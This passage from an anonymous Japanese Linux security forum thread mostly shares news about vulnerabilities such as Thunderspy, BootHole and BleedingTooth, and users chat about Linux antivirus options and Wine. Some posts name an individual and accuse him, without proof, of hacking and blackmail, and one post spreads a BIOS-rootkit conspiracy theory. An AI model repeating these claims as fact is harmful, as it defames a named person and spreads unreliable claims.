200 :login:Penguin :2020/06/09(火) 12:35:46.17 ID:bAdCtyAo.net 32 名称未設定 2020/05/11(月) 19:15:04.07 ID:nz2/6FeH0 Unfixable Flaw Found in Thunderbolt Port that Unlocks any PC in Less Than 5 Minutes | TechPowerUp https://www.techpowerup.com/266917/unfixable-flaw-found-in-thunderbolt-port-that-unlocks-any-pc-in-less-than-5-minutes Thunderspy - When Lightning Strikes Thrice: Breaking Thunderbolt 3 Security https://thunderspy.io/ deeplで翻訳 Thunderspyは、Thunderboltポートを持つデバイスをターゲットにしています。コンピュータにそのようなポートがある場合、 ドライブが暗号化されていて、コンピュータがロックされていたり、スリープ状態に設定されていたりしても、 そのポートに短時間で物理的にアクセスした攻撃者は、すべてのデータを読み取ってコピーすることができます。 Thunderspyはステルス機能を持っており、攻撃の痕跡を見つけることができません。つまり、フィッシングリンクや悪意のある ハードウェアを使用して攻撃者に騙されることはありません。Thunderspy は、短時間の外出時にコンピュータをロックしたり 中断したりするなど、最善のセキュリティ対策を行っていても動作します。また、システム管理者がデバイスをセキュアブート、 強力な BIOS とオペレーティング・システム・アカウントのパスワードで設定し、ディスクの完全な暗号化を有効にしていた場合も動作します。 攻撃者が必要とするのは、5 分間コンピュータと一緒にいるだけで、ドライバーと簡単に持ち運べるハードウェアだけです。 私たちは、インテルの設計に7つの脆弱性を発見し、悪意のある者がインテルが設定した防御機能を超えてシステムにアクセスするために、 これらの脆弱性が悪用される可能性のある9つの現実的なシナリオを開発しました。 私たちは、システムが脆弱であるかどうかを判断するために、無料でオープンソースのツール、Spycheckを開発しました。 システムが脆弱であることが判明した場合、Spycheck はシステムを保護するための推奨事項を案内します。
201 :login:Penguin :2020/06/09(火) 22:48:42 ID:bAdCtyAo.net 【AndroidでLinux】UserLAnd part1【root化不要】 https://egg.5ch.net/test/read.cgi/android/1591710049/ UserLAndは、Android上でUbuntu、Debian、Kaliなどの各種Linuxを動かせるアプリです。 オープンソースアプリです。 root化なしで動かせます。 公式 https://userland.tech/ ソースコード https://github.com/CypherpunkArmory/UserLAnd ダウンロード https://f-droid.org/packages/tech.ula
202 :login:Penguin :2020/06/23(火) 19:33:45.38 ID:2tiPRdzD.net 【独自】マイナンバーとスマホ 連携検討 免許証と連携に加え 6/23(火) 12:00 政府が、マイナンバーカードとスマートフォンの一体化を検討していることがわかった。(略 https://headlines.yahoo.co.jp/videonews/fnn?a=20200623-00155385-fnn-pol
203 :login:Penguin :2020/06/23(火) 20:04:29.14 ID:ok+f0TXB.net 行動追跡か。
204 :login:Penguin :2020/06/30(火) 16:28:14 ID:kYjLj6sM.net これandroidもじゃね? 【悲報】 TikTok、キーロガーだった [787645228] https://leia.5ch.net/test/read.cgi/poverty/1593149876/ iOS 14でバッチリ可視化、TikTokが「他アプリで入力中のテキスト」を逐一読み取る様子 https://internet.watch.impress.co.jp/docs/yajiuma/1261591.html
205 :login:Penguin :2020/06/30(火) 16:29:04 ID:kYjLj6sM.net Facebook、匿名化OS「Tails」ユーザーの正体暴く技術を開発 米FBIへ提供していたことが明らかに 匿名化技術を駆使して性犯罪を行う容疑者をFBIが逮捕 Facebookが数千万円で攻撃プログラムを開発依頼 他に打つ手がなかったFacebookのセキュリティチームは、あるサイバーセキュリティ会社に数千万円の費用を支払ってTails向けの攻撃プログラムの開発を依頼する(この企業の名前は明かされていない)。その内容は、Tailsが備える匿名化技術を「ゼロデイ攻撃」(未公開の脆弱性を狙う攻撃手法)によって破り、発信元を特定するものだ。使われたゼロデイの脆弱性はTailsにインストールされている動画プレーヤーに存在していた。 Facebookはこの攻撃ツールを仲介者を通してFBIに渡した。FBIは被害者の協力を得てこのプログラムが仕込まれた動画ファイルを容疑者に送信し、発信元の追跡に成功した。FBIはこの件についてコメントを控えている。 Tailsを開発するチームは、同容疑者に関する捜査や脆弱性について全く知らされていなかったという。Facebookは最終的にこの脆弱性を開発チームに報告する予定だったが、その間に脆弱性は修正されたという。ただし、Tailsの開発チームは脆弱性として認識していたわけではなく、開発の過程で結果的に修正されたようだ。 https://www.itmedia.co.jp/news/articles/2006/30/news078.html
206 :login:Penguin :2020/06/30(火) 21:13:07.57 ID:iYUEZH57.net >>205 >>379-380 被害者が動画送ってそれを tailsの動画プレイヤーで見たらしいな 動画プレイヤーの脆弱性らしいよ 動画プレイヤーに仕掛けられてたバックドアにゼロデイ攻撃だね ソース読んでチェックしてるのかよ>tailsのやつ
207 :login:Penguin :2020/07/03(金) 16:56:34.27 ID:WzAdi1H0.net ・Signal以上に超安全な暗号化チャットと思われていた「EncroChat」、欧州警察によるマルウェアにより一網打尽 [787645228] https://leia.5ch.net/test/read.cgi/poverty/1593759309/ https://jp.techcrunch.com/2020/07/03/2020-07-02-police-roll-up-crime-networks-in-europe-after-infiltrating-popular-encrypted-chat-app/ https://techcrunchjp.files.wordpress.com/2020/07/operation-venetic.jpg 、
208 :login:Penguin :2020/07/04(土) 16:44:07.77 ID:NLPCRgkT.net Tor VPN 最強の匿名通信方法を考えるスレ1 匿名支払 https://medaka.5ch.net/test/read.cgi/sec/1593848365/
209 :login:Penguin :2020/07/30(木) 20:54:33.24 ID:CUYmulWq.net ほぼすべてのLinuxのブートローダーに脆弱性 - PC Watch https://pc.watch.impress.co.jp/docs/news/1268335.html 米セキュリティ企業のEclypsiumは7月29日(現地時間)、GRUB2ブートローダーに存在する脆弱性「BootHole」について報告した。 GRUB2は、多くのLinuxディストリビューションで利用されているブートローダー。そのため、BootHole(CVE-2020-10713ほか)の影響は広範囲におよび、セキュアブートを有効にしている場合でも悪用が可能だという。 各ベンダーに事前に通達済みで、同日よりアドバイザリーやアップデートが順次提供される予定。 設定ファイルである「grub.cfg」をGRUB2が読み出すプロセスにおいて、バッファオーバーフローの脆弱性が存在する。grub.cfgはEFIシステムパーティション内部にあるテキストファイルで、管理者権限を得た攻撃者によってブートローダー本体の整合性を保ったまま変更できる。 バッファオーバーフローを悪用することで、攻撃者はUEFI実行環境内において任意のコードが実行可能。マルウェアの実行やブートプロセスの変更、永続的かつステルスなブートキットの導入などができるようになる。 OSの読み込みより前に攻撃者によるコードを実行できてしまうため、実質的にデバイスを完全制御下に置けるかたちとなる。 緩和策としては、GRUB2自体の更新などが必要となるほか、セキュアブートではコンポーネントの検証プロセスにおいてMicrosoftによる電子署名が広く利用されているため、同社によるアップデートも提供される見込み。 ブートローダーはその特性上、更新時のトラブルによってデバイスが起動不可に陥る場合もあるため慎重に進める必要があるが、BootHoleは特権昇格の脆弱性を通じて悪用が可能な脆弱性であることから、EclypsiumではまずはOS自体のアップデートを適宜行なうことを推奨している。 (全文引用、改行適当挿入)
210 :login:Penguin :2020/07/30(木) 21:34:45.02 ID:tMJ70ZQJ.net >管理者権限を得た攻撃者 俺も管理者権限持ってれば俺のgrubなんて容易に改変可能なのだが、、
211 :login:Penguin :2020/07/31(金) 12:13:41.62 ID:f4vH+ZVs.net AMDに脆弱性ガーと同じ原理じゃないか… (裏でIntelが出資した某アホ研究会社…と同じ) ミッションインポッシブルできるわけがないわけで…
212 :login:Penguin :2020/08/03(月) 19:28:23.41 ID:A0D9Xhej.net https://mao.5ch.net/test/read.cgi/linux/1593922337/574 574 名前:login:Penguin [sage]: 2020/07/28(火) 02:27:19.00 ID:1WEp4Dpz (2) かつてデル男に、「ホモ男」「Dion君」などと呼ばれていた者です。 デル男が志賀だという状況証拠を提示したのも私です。 デル男の活動が活発だった頃の末期に、うっかりIPアドレス(固定IP)を 晒したばっかりに、デル男にポート総当り攻撃を仕掛けられ、ルーターに 侵入され、PCに侵入され個人情報を盗まれました。 HDDのOSがアクセスできない領域にキーロガー等を仕込まれたらしく、 今でも情報を盗まれています。 その後、志賀のライセンス違反が発覚し、私はまとめサイトの記事を書いたり 比較的積極的に志賀のライセンス違反拡散活動に従事しているのですが、 その度に盗まれた個人情報をちらつかせて脅されます。 この、デル男→ライセンス違反の流れの中での私のクラッキング被害の連続性から言って、 志賀=デル男だと断言できます。
213 :login:Penguin :2020/08/03(月) 19:28:36.94 ID:A0D9Xhej.net https://mao.5ch.net/test/read.cgi/linux/1593922337/594 594 名前:574 [sage]: 2020/07/29(水) 10:27:37.36 ID:MGMjPdwp >>574 です。 私は発達障害を持っています。私の個人情報を盗んでいる志賀も、もちろんそのことを知っています。 そして、志賀は、Ubuntuスレで「ハッタツ君」というキャラを産み出しました。そしてしつこく登場させました。 これは明らかに、活発に志賀ライセンス違反の拡散活動を行う私への暗示的な当てつけ&脅しです。 このように志賀は、犯罪行為を行うだけでなく、中傷のために差別的言動を平然とします。 知性ある人間の行動には程遠いです。
214 :login:Penguin :2020/08/05(水) 21:20:23.06 ID:brKuFFFW.net 志賀慶一の存在自体がセキュリティリスクです
215 :login:Penguin :2020/08/21(金) 22:49:04.88 ID:T1X/iY5P.net NSAとFBI、Linux向けマルウェア「Drovorub」に関するアドバイザリを公開 「Drovorub」の拡散はロシアの情報機関であるGRU(参謀本部情報局)と関連のあるAPT28(別名Fancy Bear、Strontiumなど)の手によるもので、スパイ活動および公共機関やIT企業から機密情報を盗みだすことを目的に行われているという。 https://news.mynavi.jp/article/20200818-1232625/
216 :login:Penguin :2020/10/05(月) 13:25:20.50 ID:NkCuixWc.net あー おにゃのこなめたいおにゃのこなめたい
217 :login:Penguin :2020/10/10(土) 01:54:37.19 ID:g39SN+yC.net Google、「特定の住所を検索した人」のIPアドレスを警察に提供 [618676474] https://leia.5ch.net/test/read.cgi/poverty/1602256833/ 検索履歴は極めて個人的なことを暴いてしまうものであり、警察がこのセンシティブな情報を要求するには通常、 既知の容疑者に対する令状が必要だ。しかし、最近公開された裁判所文書により、捜査当局が容疑者を特定する前に、 あるキーワードを検索した全ユーザーの情報を開示することをGoogleに要請できることが明らかになった。 警察は8月、性的暴行の罪で起訴されている歌手のR. Kelly被告の関係者であるMichael Williams容疑者を、 フロリダ州で目撃者の車に火をつけたとして逮捕した。捜査当局は、「放火があった時刻近くに当該住宅の住所を検索した ユーザー」に関する情報を要請する捜査令状をGoogleに送付した後、Williams容疑者を放火と証人買収の罪に関連付けた。 この7月の裁判所文書は米国時間10月6日に公開され、Detroit NewsのRobert Snell記者がこの文書についてツイートした。 裁判所文書には、放火の被害者の住所を検索した人のIPアドレスをGoogleが提供し、それが容疑者の電話番号と 関連していることを捜査当局が発見したと書かれている。警察はその後、その電話番号の履歴をたどって、 放火現場の近くにあったWilliams容疑者の端末の位置を特定したという。 Googleに送られた捜査令状の原本はまだ公開されていないが、今回のことは、捜査当局がGoogleに対して、1人の容疑者に 関する特定の情報ではなく、大きなユーザーグループに関するデータを要請する傾向が高まっていることを示す新たな例となった。 https://news.yahoo.co.jp/articles/588b07e1451ee9a978edf2ffd4dc812846d02b12
218 :login:Penguin :2020/10/12(月) 13:10:55.07 ID:xKjywmC1.net 機密情報を共有する5カ国協定、いわゆる「ファイブアイズ」の参加国(米国、英国、カナダ、オーストラリア、ニュージーランド)が、日本およびインドの政府代表と連名で声明を発表した。テクノロジー企業に向けて、エンドツーエンドの暗号化された通信に法執行機関がアクセスすることを可能にする解決策の開発を要請している。 この声明は、暗号にバックドアを設けることをテクノロジー企業に同意させようとする、ファイブアイズの最新の取り組みだ。 各国の政府関係者はこれまでと同様、テクノロジー企業が製品にエンドツーエンド暗号化(E2EE)を組み込むことで犯罪捜査が困難になったと主張している。 7カ国の政府代表は、現在の主要なテクノロジープラットフォームでサポートされているE2EEの仕組みのために、法執行機関が犯罪組織を捜査できないばかりか、テクノロジープラットフォーム各社も、一般市民を守るためのサービス利用規約を守らせることができずにいると主張している。 声明では、「暗号化技術の特定の実装」によって、法執行機関の捜査に問題が生じているとしている。テクノロジープラットフォーム各社も一部の通信内容にアクセスできず、捜査当局に必要なデータを提供できないからだ。 これにより、犯罪活動にとって安全な避難場所の確保を許し、「性的に搾取されている児童など、われわれの社会の中でも特に弱い立場の人々」を危険にさらしてしまうという。 7カ国はテクノロジー業界と協力し、ユーザーが引き続き安全で暗号化された通信を利用できるだけでなく、法執行機関とテクノロジー企業も犯罪活動を取り締まれる解決策を開発するよう尽力していくとした。 暗号化されたインスタントメッセージアプリだけではなく、「デバイスの暗号化、カスタム暗号化アプリ、統合プラットフォーム全体の暗号化」も対象となるという。 2018年には、オーストラリアが主要な民主主義国家の中で初めて「反暗号化法」を導入した。同様の取り組みは米国や欧州でもあったが、そこまで成功しなかった。主な理由は、テクノロジー企業や非営利団体、一般市民からの反発だ。 しかし、西側の政府が機密情報の収集能力で中国と対等になろうとする中、オーストラリアと同様の対応を求める圧力が近年高まっている。 https://japan.cnet.com/article/35160775/
219 :login:Penguin :2020/10/18(日) 06:38:34.76 ID:f07qlYZ2.net LinuxのBluetoothスタックに任意コード実行可能な脆弱性か 2020/10/17 19:31 著者:後藤大地 https://news.mynavi.jp/article/20201017-1419370/ Intelは10月13日(米国時間)、「INTEL-SA-00435 - BlueZ Advisory」において、同社が提供する Bluetoothスタックの一部である「BlueZ」 をサポートする Linux Kernel 5.9 より前のすべてのバー ジョンに、特権昇格や情報窃取につながる潜在的な脆弱性が存在すると伝えた。Intelは3つの脆弱性を 報告しており、うちひとつは深刻度が重大(High)に分類されている。 攻撃者が物理的にデバイスに接近できる場合、この脆弱性を悪用した攻撃を受ける危険性があるほか、 Linuxカーネルを使ったIoTデバイスが影響を受ける可能性がある。ただし、脆弱性の詳細情報はまだ 公開されていない。この脆弱性を突いた攻撃がどのように実施されるのか、今後の詳細な報告が待た れる。 情報セキュリティエンジニアのAndy Nguyen氏がTwitterで報告したメッセージによれば、脆弱性の 詳細は「Google Online Security Blog」に掲載されるという。同氏はこの脆弱性のPoCと見られる 動画のURLもツイートしているが、その動画では近接するLinux PCに対してこの脆弱性を悪用して任意の コードが実行される様子が示されている。この脆弱性は「BleedingTooth」と呼ばれている。(後略)
220 :login:Penguin :2020/10/19(月) 02:27:59.47 ID:d+5XKEVu.net 東芝が「究極の暗号」、「量子暗号」サービスを開始すると発表 [256556981] https://leia.5ch.net/test/read.cgi/poverty/1603035516/ 1 番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイW 9fae-NK1U) 2020/10/19(月) 00:38:36.15 ID:dfhMI9gI0 BE:256556981-2BP(1000) 東芝が「究極の暗号」サービス 米英で提携、シェア首位狙う 東芝は19日、盗聴やハッキングが理論上不可能とされる「量子暗号」を利用できる企業向けサービスを2025年度までに国内外で始めると発表した。海外では米ベライゾン・コミュニケーションズ、英BTグループの通信大手と相次ぎ提携し、今年9月からそれぞれ現地で実証実験を開始。シンガポール、韓国などの通信事業者とも協議を進めており、次世代の「究極の暗号」技術で世界トップシェアを狙う。 東芝は米英で提携先の光ファイバー回線を使い、大容量データの量子暗号化や解読に必要な「鍵」の送受信、模擬の不正アクセスなどを実施。ベライゾンやBTと結果を検証するなど、国内外で量子暗号を使う情報保全事業の立ち上げを急ぐ。英中部ケンブリッジでは年内に関連機器の製造拠点を設ける。 スーパーコンピューターの性能をはるかに上回る量子コンピューターが30年代にかけて実用化されると、現在の暗号は破られるリスクが高まる。国内では量子暗号導入に向けた総務省の実証事業を約43億円で受注。21年4月に着手する。防衛省や警察庁への導入も視野に入れる。 先行する中国、米国勢をにらみ、安全保障分野などで情報保全の飛躍的向上を後押しする。東芝はさらに、金融、医療をはじめ高い秘匿性が要求される民間利用を見込んで、国内通信大手との提携につなげたい考えだ。 https://news.yahoo.co.jp/articles/877338e6321824faf04486997698ac8141263cc3
221 :login:Penguin :2020/10/22(木) 03:35:06.10 ID:i7lwsGnq.net sophos linux版が消えたの普通に痛くね
222 :login:Penguin :2020/10/22(木) 12:20:01.34 ID:Q5k2CXke.net >>221 痛すぎ 他に代替ないんだもん 怪しい会社ばっか でも、すでにインストールされてるsophosを 1ヶ月ぐらい前に確認したら ウイルス定義ファイルはまだ更新してくれてた
223 :login:Penguin :2020/10/22(木) 13:33:41.69 ID:7lHMDkpq.net clamavじゃいかんのか?
224 :login:Penguin :2020/10/22(木) 19:10:54.64 ID:n7zgsOXk.net え、消えたの…?と思ってぐぐったらマジで消えてた…
225 :login:Penguin :2020/10/22(木) 23:22:50.98 ID:f4SsAYem.net clamavは比較対象にもならない まあ有料版はあるんだが、どれだけ無料版に頼ってたかって話だな…
226 :login:Penguin :2020/10/22(木) 23:39:19.14 ID:Q5k2CXke.net >>223 あれは検出力糞すぎらしい
227 :login:Penguin :2020/10/22(木) 23:42:10.46 ID:Q5k2CXke.net >>225 有料版って20個ぐらいのライセンスセットみたいのばっかじゃない? 1個ずつ買えんのかね ノートンも1ずつ買えんよねえ
228 :login:Penguin :2020/12/17(木) 13:33:45.76 ID:JiJqFrlO.net 〆 川 ヽ (´・ω・`) .。oO(熟女専科…) (U ) `u-u´
229 :login:Penguin :2021/01/10(日) 23:12:08.13 ID:a8QEqhHY.net あけおめ。
230 :login:Penguin :2021/01/11(月) 20:36:24.74 ID:+FRlrpZ3.net ...【セキュリティ】Air-Fi:隔離されたコンピューターからデータを盗み出す [すらいむ★] Air-Fi:隔離されたコンピューターからデータを盗み出す Wi-Fi対応ではないコンピューターでもWi-Fiで情報を送信できる https://blog.kaspersky.co.jp/air-fi-data-exfiltration/29846/ https://egg.5ch.net/test/read.cgi/scienceplus/1610070895/
231 :login:Penguin :2021/02/03(水) 12:17:00.56 ID:nzTGm1hR2 デキる人ほどフリーランス化する?★働き方改革https://www.youtube.com/watch?v=ALflcwYOJtQ 年収890万円以下は社会のお荷物★騙される労働者https://www.youtube.com/watch?v=CAp-ZrJpF54 騙されたくなかったら勉強しろ★他人のルールは損をするhttps://www.youtube.com/watch?v=s176O6qKuPw 底辺の99%は一生底辺★10年後が見えない同僚たちhttps://www.youtube.com/watch?v=4Mfiwn2sPD8 稼ぎたければ働くな★4千万円ぽっちも稼げないのはなぜ?https://www.youtube.com/watch?v=Fi7bILN4wes サラリーマン思考では儲からない理由https://www.youtube.com/watch?v=iW6oAo0q0ZI 「頭使えよ貧乏人」に思う、寝てても金入るシステムを作る人https://www.youtube.com/watch?v=VEB6M_s6abs
232 :運用情報臨時板でワッチョイ導入議論中 :2021/02/25(木) 20:22:24.28 ID:nQxAiBdW.net sophosはインストーラー持ってれば新規インストールもできる
233 :運用情報臨時板でワッチョイ導入議論中 :2021/02/25(木) 23:14:03.57 ID:KC6htJgv.net >>232 そこが不思議だよな ウイルス定義ファイルも更新され続けてるし ユーザー増えると負荷かかりすぎるのかねえ
234 :運用情報臨時板でワッチョイ導入議論中 :2021/03/09(火) 22:31:27.07 ID:nUzJdA9A.net 「Linux 5.12 rc1に厄介なバグ」、トーバルズ氏が警告 https://japan.zdnet.com/article/35167530/
235 :login:Penguin :2021/05/02(日) 18:37:43.87 ID:04bhmCI/.net 彡⌒ミ〆川 ヽ (´・ω・`)・ω・`) / つ⊂ \ 怖いずら
236 :login:Penguin :2021/05/04(火) 00:10:22.32 ID:xLDS/IIK.net sophosインストーラー持ってる奴勝ち組
237 :login:Penguin :2021/05/04(火) 04:03:48.33 ID:q021lZ4A.net >>236 マジでこれ いまだにウイルス定義最新版に更新できるもんな なんでインストーラーダウンロード打ち切ったんだろう? ウイルス定義更新するならダウンロード出来るようにしとけばいいのに
238 :login:Penguin :2021/05/04(火) 04:04:04.40 ID:q021lZ4A.net >>236 マジでこれ いまだにウイルス定義最新版に更新できるもんな なんでインストーラーダウンロード打ち切ったんだろう? ウイルス定義更新するならダウンロード出来るようにしとけばいいのに
239 :login:Penguin :2021/05/10(月) 22:45:29.33 ID:b1KDMEzk.net ここの>>30 ぐらいからのレスバがすごいww 【徹底討論】 Linuxにバックドアはあるのか? s://mao.5ch.net/test/read.cgi/linux/1558455408/28
240 :login:Penguin :2021/05/20(木) 23:28:35.36 ID:OX3aECUm.net 最近Windowsから移行していろいろ調べた結果eset NOD32にしたんだがどうだろう? 国内代理店のキヤノンが売ってくれないからVPN使ってインド版サイトで買ったよ
241 :login:Penguin :2021/05/21(金) 19:31:08.07 ID:xce5GRbW.net セキュリティ担当の皆様へ 昔に比べて、ブートに必要な記憶領域が増えています UEFIのESP領域やBIOSの記憶領域等が大幅に増えています そうした規格を構築したのがインテルとビル・ゲイツです セキュリティ問題の本質はそこにあります 即ちBIOSのROMとEFIに関連する記憶領域を組み合わせて OSに関係なく、ブートからマシンを乗っ取る ルートキットを仕込むことが可能なのです そんな事あるわけない、と思うかもしれませんが 今回デルが発表したBIOS-ROMのセキュリティ問題は その可能性を示唆しているように思います デルは麦軍との関係が強い企業です 元MSAのスノーデンは表向きデルの職員として活動にあたりました ロシアや中国、北朝鮮なども諜報活動を行っていますが 世界一の諜報活動を行っているのは麦軍なのです 危険ですよ!と騒ぐうちに提供される更新ファイルも 本当に安全なのか、確認するべきです 新たなルートキットを仕込まれた可能性もあります あくまでも可能性の話ではありますが、ご注意を
242 :login:Penguin :2021/05/21(金) 21:37:11.60 ID:bqJgvTZ1.net 変なやつが来たなぁ・・・
243 :login:Penguin :2021/05/21(金) 23:03:50.32 ID:kE2Dnilb.net ひろゆき「バイオス仕込みのスパイウェアとかアップデートしたら消えちゃうんでどの道仕込むの難しいんですよね ハードウェアで仕込むとわかる人にはバレちゃうし」
244 :login:Penguin :2021/05/22(土) 15:45:02.63 ID:rJ8gSmbP.net むぎむぎぐんってなに
245 :login:Penguin :2021/07/10(土) 17:38:46.38 ID:Lj3ceuFs.net .。oO( アッ ソコソコ… ) <,⌒/ヽ-、___ /<,3/____/  ̄ ̄ ̄ ̄ ̄ ̄ ̄
246 :login:Penguin :2021/07/10(土) 19:33:16.40 ID:U/4q+Z75.net Linux Defenderはよ
247 :login:Penguin :2021/07/19(月) 18:26:39.28 ID:rfzbIh30.net Is Open-Source Software Secure? The code is open, anyone can see it. Is it a security risk? July 18, 2021 It's FOSS
248 :login:Penguin :2021/07/19(月) 18:29:04.47 ID:rfzbIh30.net >>247 Why Should You Care if Open-Source Software is Secure? No matter whether you use Linux or any other operating system, you will be surrounded with open-source software in some way (directly/indirectly). To give you an example, most of the proprietary software tools depend on some form of open-source libraries to make things work. Furthermore, there is a reason why companies of various scale (including Google, Microsoft, and Facebook) rely on open-source software or contribute their resources to the open-source community in one way or the other. Hence, the security of open-source software is something essential to know about.
249 :login:Penguin :2021/07/19(月) 19:35:13.95 ID:rfzbIh30.net >>248 なぜ、オープンソース・ソフトウェアが安全かどうかを気にする必要があるのでしょうか? Linuxやその他のOSを使用していても、何らかの形で(直接的または間接的に)オープンソース・ソフトウェアに囲まれているはずです。 例えば、ほとんどのプロプライエタリなソフトウェアツールは、何らかの形でオープンソースのライブラリに依存して動作しています。 さらに、Google、Microsoft、Facebookなどの様々な規模の企業が、何らかの形でオープンソース・ソフトウェアに依存したり、自社のリソースをオープンソース・コミュニティに提供したりしているのには理由があります。 そういうことですから、オープンソース・ソフトウェアのセキュリティについては、知っておかなければならないことなのです。
250 :login:Penguin :2021/07/19(月) 19:43:03.04 ID:rfzbIh30.net >>249 セキュリティの観点からオープンソース・ソフトウェアの短所を指摘する議論はいくつかありますが、中には全く意味をなさないものもあります。 「誰でもコードを見たり、悪用したりできる」 確かに、コードは誰でもアクセスできます。しかし、コードを見ることができるからといって、誰もがそれを悪用できるということでしょうか。そうではありません。 誰でもソフトウェアのフォーク(コピー)を作ることができても、オリジナルのソフトウェアを簡単に操作することはできません。 通常、プロジェクトのメンテナ(またはそのグループ)は、コードリポジトリを管理し、貢献者からのコミットを受け入れます。コードは承認前にレビューされます。そして、誰もが簡単にコードを乗っ取ることはできません。 オープンソース、クローズドソースを問わず、攻撃者がソフトウェアの脆弱性を突いたり、悪意のあるコードを追加したりするには努力が必要です。
251 :login:Penguin :2021/07/19(月) 20:55:10.63 ID:rfzbIh30.net >>251 たとえコードが開発者の世界でアクセス可能であっても、プロジェクトにはコードを徹底的にレビューできるだけの貢献者や開発者がいない可能性があります。 そのような場合、オープンソース・ソフトウェアが査読されていることに大きな自信を持つことはできませんが、まさにそれが欠けているからです。 オープンソース・ソフトウェアは、オープンソースであることを理由に、最高のセキュリティを備えていると「主張」するかもしれませんが、十分な数の開発者がいない場合には誤解を招くことになります。 また、何人の開発者がコードを見ているのか、レビューしているのか、コードのウォークスルーがどのように行われているのかもわかりません。
252 :login:Penguin :2021/07/19(月) 20:59:28.98 ID:rfzbIh30.net >>250-251 セキュリティに関して、優れたものはありません。クローズドソースであろうとオープンソースであろうと、セキュリティに関しては同じ原理が適用されます。 ソフトウェアのセキュリティに影響を与える外部要因には様々なものがありますが、その多くはソースに依存しません。安全性を保つためには、同じようにコードを監視する必要があります。 確かに、オープンソースのアプローチは、クローズドソースのソフトウェアにはないメリットを導入していますが、だからといって防弾仕様というわけではありません。 (以上、重要箇所のみ訳出掲載しました -- Creative Commons Attribution-ShareAlike 4.0 International License.)
253 :login:Penguin :2021/07/20(火) 18:07:35.12 ID:RJeOgDMv.net これもID:0slAOwnDかな。 http://mao.5ch.net/test/read.cgi/linux/1465741067/252 > 245:login:Penguin 2021/07/19(月) 20:59:28.98 ID:rfzbIh30 中略 > (以上、重要箇所のみ訳出掲載しました -- Creative Commons Attribution-ShareAlike 4.0 International License.) 勝手に翻訳してitsfoss.comの権利を侵害し、勝手にクリエイティブ・コモンズにして5chの権利も侵害しとる >>367 ID:0slAOwnDみたいに海外記事を勝手に機械翻訳して書き込む輩はどんどん出てくるだろうし、その都度削除依頼するのも切がないかと。 俺らにできるのはそういう輩をバカにするぐらいじゃね。
254 :login:Penguin :2021/07/20(火) 18:08:21.92 ID:RJeOgDMv.net ええ…
255 :login:Penguin :2021/08/19(木) 23:19:26.37 ID:uxuTKr2E.net 壁|ω゚ )┻┛ あー おにゃのこなめたい おにゃのこなめたい …
256 :login:Penguin :2021/08/24(火) 22:51:02.61 ID:wtZMW9lc.net カーネル5.11.0-27で、マシンがめっちゃ熱くなったりフリーズしたりするようになった sophosをアンインストールしたら静かになったので、まあ間違いなく原因だわ…
257 :login:Penguin :2021/09/09(木) 14:43:27.01 ID:C0tKvDkQ.net OpenSSL 3.0リリース、ライセンスをApache License 2.0に変更 | TECH+ https://news.mynavi.jp/article/20210908-1967718/
258 :login:Penguin :2021/09/09(木) 21:07:51.58 ID:TMHDLSeT.net Dockerとかコンテナのセキュリティのためのベストプラクティス的な資料を作りたいんですが、 何か参考になる書籍でオススメとかあったら教えて頂けませんでしょうか?
259 :login:Penguin :2021/09/10(金) 00:53:44.40 ID:3qQOXhMB.net 既にある物を作る意味とは?
260 :login:Penguin :2021/09/10(金) 10:00:50.10 ID:8Sb2Dt5o.net 表現方法で変わるから 漫画で書いたりとかじゃないかな
261 :login:Penguin :2021/09/28(火) 05:31:10.45 ID:jjeqVEuU.net RedditにRaspberryPiを対象にしたランサムウェアがあるかという質問があり そういうものは無いというのがスレの見解になってましたが Linuxを対象にしたランサムウェアがあり、ARM対応のランサムウェアもあるようです 両方合わせたらRaspberryPiOSを対象にしたランサムウェアが作れると思うのですが、なぜ未だに無いのでしょうか? 処理速度が遅い上に重要ファイルを預けるデバイスではなく、感染したらSDカード交換すれば復旧するものだからですか?
262 :login:Penguin :2021/09/28(火) 05:41:25.88 ID:+rPcBB0M.net DELLのPCを対象にしたランサムウェアがあるか と同じ話な気がするけどなあ
263 :login:Penguin :2021/10/13(水) 12:17:36.76 ID:QMedILWp.net 脆弱性スコアはそれほどでも無いけど更新は来るかな CVE-2021-41617 : sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows privilege escalatio https://www.cvedetails.com/cve/CVE-2021-41617/
264 :login:Penguin :2021/11/19(金) 12:50:54.81 ID:tx8Tq3HI.net ___ (\ ∞ ノ ヽ)_ノ
265 :login:Penguin :2022/02/25(金) 16:25:55.78 ID:UqNZguHP.net >>240 俺もリアルタイムスキャン有効にして入れたが鬼重くなったよ。 全く現実的ではない。
266 :login:Penguin :2022/03/07(月) 23:53:18.14 ID:Vza7/K3I.net Linuxのコンテナ技術にエスケープの脆弱性、アップデートを - 記事詳細|Infoseekニュース https://news.infoseek.co.jp/article/mynavi_2378065/
267 :login:Penguin :2022/03/09(水) 22:00:41.68 ID:aQk8QjzH.net エスケープ?
268 :login:Penguin :2022/03/10(木) 00:05:05.06 ID:tQm505Oh.net コンテナからお漏らしするってことだろ
269 :login:Penguin :2022/03/16(水) 02:32:45.72 ID:+CfXCT5Z.net wineって仮想環境ですよね? wine内でランサムウェアが起動した場合、wine外には広がらないのでしょうか? 仮想環境の入れ子にして、ホストLinuxゲストLinuxでゲストにwine という形にしたらアンチウイルスなくても感染ブロックできますか?
270 :login:Penguin :2022/03/16(水) 02:58:45.74 ID:pHTLQHYt.net >>269 なんでそう思うの?
271 :login:Penguin :2022/03/16(水) 20:59:03.15 ID:hlky3M2L.net Wineで動作する想定のそれがあったらどうかと考えると
272 :login:Penguin :2022/03/16(水) 21:41:55.56 ID:YlrPIZEh.net すごい古い記事だけど。 WineでWindowsウィルスを動かす https://mag.osdn.jp/05/01/31/0346216
273 :login:Penguin :2022/03/16(水) 22:24:54.95 ID:YOcrTJTS.net Wineは仮想環境ではない Wineはエミュレータではない Wineは互換性レイヤー
274 :login:Penguin :2022/03/16(水) 23:29:19.22 ID:N+UZSh6o.net >互換レイヤー ふわっとした理解だけど 発行されたWindowsAPIへのアクセスをLinuxシステムコールに変換する +互換のない・不足するAPIやサブシステムを補完する って感じなんだろうか…? 物理マシンとは別のカーネルが動くのではなく カーネルにWinのバイナリの言葉を翻訳して渡す感じ…?
275 :login:Penguin :2022/03/19(土) 16:06:29.72 ID:jttyZDwc.net ざっくりいうとそんなかんじ
276 :login:Penguin :2022/03/20(日) 00:23:55.05 ID:x64/Dmdi.net Winのアプリの脆弱性をついた攻撃もLinuxに反映される?
